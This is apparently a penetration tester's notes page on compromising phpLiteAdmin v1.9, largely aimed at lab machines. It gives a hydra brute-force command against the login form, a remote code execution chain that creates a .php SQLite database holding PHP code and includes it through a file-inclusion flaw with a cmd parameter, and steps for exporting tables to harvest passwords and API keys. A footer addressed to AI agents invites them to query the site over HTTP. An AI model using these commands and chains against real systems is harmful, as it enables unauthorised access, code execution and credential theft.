> For the complete documentation index, see [llms.txt](https://book.ice-wzl.xyz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://book.ice-wzl.xyz/things-i-have-pwnd-before/phpliteadmin.md). # phpLiteAdmin phpLiteAdmin v1.9 – web UI for SQLite databases. Often found under `/db/` on HTTPS virtual hosts. **Common path:** `https://TARGET/db/` or `https://TARGET.htb/db/` *** ## Discovery * Directory bust HTTPS (e.g. `gobuster dir -k -u https://TARGET -w ...` or feroxbuster). * Nikto may report: `/db/: This might be interesting`, cookie flags (PHPSESSID without secure/httponly). * PHP error on page can leak path: e.g. `Warning: rand() expects parameter 2 to be integer, float given in /var/www/ssl/db/index.php on line 114`. *** ## Default / weak credentials | Username | Password | | -------- | ------------------------------------------------------------------- | | `admin` | (often default or weak; try `admin`, `password123`, or brute force) | **Brute force (HTTPS POST form):** ```bash hydra -l admin -P /usr/share/seclists/Passwords/2023-200_most_used_passwords.txt TARGET_IP https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password." -t 3 ``` Reference: [Acunetix – phpLiteAdmin default password](https://www.acunetix.com/vulnerabilities/web/phpliteadmin-default-password/) *** ## RCE: Create PHP database + LFI If you can create a SQLite database and if the server has an LFI that can include files from a path where the DB is stored (e.g. `/var/tmp/`): 1. Log in to phpLiteAdmin. 2. Create a new database named `shell.php` or `d.php` (extension must be `.php`). 3. Create a table with one TEXT column and set the default value to PHP code. Use double quotes in the payload because this web app uses single quotes in the insertion command:\ `` 4. Example: table name `d`, column `d` type TEXT default ``\ Resulting SQL:\ `CREATE TABLE 'd' ('d' TEXT default '')` 5. Include the DB file via LFI (adjust path to match server; e.g. DB path `/var/tmp/`):\ `https://TARGET/manage.php?notes=/validNote/../var/tmp/d.php&cmd=id` **Exploit walkthrough:** *** ## Export DB as CSV You can export the SQLite database as CSV from the UI. Use the export view: `https://TARGET/db/index.php?view=export` Exported tables may contain credentials (e.g. users, sessions, config). Download or view the CSV and search for passwords, API keys, or other sensitive data. The export may also leak paths or PHP notices in the output (e.g. `Undefined index: single_table` in `index.php`), which can help with further exploitation. --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://book.ice-wzl.xyz/things-i-have-pwnd-before/phpliteadmin.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.